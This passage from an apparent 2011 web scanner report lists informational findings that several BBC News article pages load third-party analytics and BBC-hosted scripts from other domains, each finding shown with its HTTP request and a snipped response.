GET /news/uk-12435618 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:54 GMT
Keep-Alive: timeout=10, max=762
Expires: Sat, 12 Feb 2011 02:02:54 GMT
Connection: close
Set-Cookie: BBC-UID=24fdb5356ecaf4debb8ae1bd313b7eabe554f7b730b0013a544b6aa4e09c26720Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:54 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=24fdb5356ecaf4debb8ae1bd313b7eabe554f7b730b0013a544b6aa4e09c26720Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:54 GMT; path=/; domain=bbc.co.uk;
Content-Length: 72496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.23. http://www.bbc.co.uk/news/uk-12437244  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-12437244

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/uk-12437244 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:55 GMT
Keep-Alive: timeout=10, max=768
Expires: Sat, 12 Feb 2011 02:02:55 GMT
Connection: close
Set-Cookie: BBC-UID=946d05859e4a442ff900af849105a5df1ca7581e40e0a1898babf30f78e4569c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:55 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=946d05859e4a442ff900af849105a5df1ca7581e40e0a1898babf30f78e4569c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:55 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.24. http://www.bbc.co.uk/news/uk-england-london-12438040  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-england-london-12438040

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/uk-england-london-12438040 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:56 GMT
Keep-Alive: timeout=10, max=793
Expires: Sat, 12 Feb 2011 02:02:56 GMT
Connection: close
Set-Cookie: BBC-UID=448dd5d5beda6590fa6279dd51620c560b0a78bb60f001e9db9bf3bea83da36a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:56 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=448dd5d5beda6590fa6279dd51620c560b0a78bb60f001e9db9bf3bea83da36a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:56 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56973

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.25. http://www.bbc.co.uk/news/uk-northern-ireland-12427112  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-northern-ireland-12427112

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/uk-northern-ireland-12427112 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:57 GMT
Keep-Alive: timeout=10, max=759
Expires: Sat, 12 Feb 2011 02:02:57 GMT
Connection: close
Set-Cookie: BBC-UID=148de5054e8ab551ab4a8f5951ed1f0516485c23d0808179ab3bc2adb49ff13e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:57 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=148de5054e8ab551ab4a8f5951ed1f0516485c23d0808179ab3bc2adb49ff13e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:57 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.26. http://www.bbc.co.uk/news/uk-northern-ireland-12428837  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-northern-ireland-12428837

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/uk-northern-ireland-12428837 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:58 GMT
Keep-Alive: timeout=10, max=783
Expires: Sat, 12 Feb 2011 02:02:58 GMT
Connection: close
Set-Cookie: BBC-UID=b49df5856e3a05f2ba62ea37a13ba43da569a2e720d031491b6b33de68ad635a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:58 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b49df5856e3a05f2ba62ea37a13ba43da569a2e720d031491b6b33de68ad635a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:58 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.27. http://www.bbc.co.uk/news/uk-politics-12428814  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-politics-12428814

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/uk-politics-12428814 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:58 GMT
Keep-Alive: timeout=10, max=679
Expires: Sat, 12 Feb 2011 02:02:58 GMT
Connection: close
Set-Cookie: BBC-UID=b46d05a56e7ae522aeef0d1e81ff1e95e05a8d8f4010c12ae42bcac561612a4e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:58 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b46d05a56e7ae522aeef0d1e81ff1e95e05a8d8f4010c12ae42bcac561612a4e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:58 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.3//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.28. http://www.bbc.co.uk/news/uk-scotland-12433015  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-scotland-12433015

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/uk-scotland-12433015 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:59 GMT
Keep-Alive: timeout=10, max=758
Expires: Sat, 12 Feb 2011 02:02:59 GMT
Connection: close
Set-Cookie: BBC-UID=34ed35558eeae523bab13453a119e5ec2335e6be50b041494bcb73b217dd395e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:59 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=34ed35558eeae523bab13453a119e5ec2335e6be50b041494bcb73b217dd395e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:59 GMT; path=/; domain=bbc.co.uk;
Content-Length: 59088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.29. http://www.bbc.co.uk/news/uk-scotland-tayside-central-12433192  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-scotland-tayside-central-12433192

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/uk-scotland-tayside-central-12433192 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:00 GMT
Keep-Alive: timeout=10, max=723
Expires: Sat, 12 Feb 2011 02:03:00 GMT
Connection: close
Set-Cookie: BBC-UID=14ada5e54eeac5b49bf80e8501b7169dea5a5de76030d18a743beab5fb116c9a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:00 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=14ada5e54eeac5b49bf80e8501b7169dea5a5de76030d18a743beab5fb116c9a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:00 GMT; path=/; domain=bbc.co.uk;
Content-Length: 60330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.30. http://www.bbc.co.uk/news/uk-wales-12427865  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-wales-12427865

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/uk-wales-12427865 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:01 GMT
Keep-Alive: timeout=10, max=731
Expires: Sat, 12 Feb 2011 02:03:01 GMT
Connection: close
Set-Cookie: BBC-UID=246d55856e4aa5658bca24e421d0a77239544b3050f0515a243bcac4c08c26220Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:01 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=246d55856e4aa5658bca24e421d0a77239544b3050f0515a243bcac4c08c26220Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:01 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.31. http://www.bbc.co.uk/news/uk-wales-12433322  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-wales-12433322

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/uk-wales-12433322 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:01 GMT
Keep-Alive: timeout=10, max=660
Expires: Sat, 12 Feb 2011 02:03:01 GMT
Connection: close
Set-Cookie: BBC-UID=a49d8585aeea05757e2fffb1510341d93146ef955010519a744baae5d1416aae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:01 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a49d8585aeea05757e2fffb1510341d93146ef955010519a744baae5d1416aae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:01 GMT; path=/; domain=bbc.co.uk;
Content-Length: 60144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.3//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.32. http://www.bbc.co.uk/news/world-12428938  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
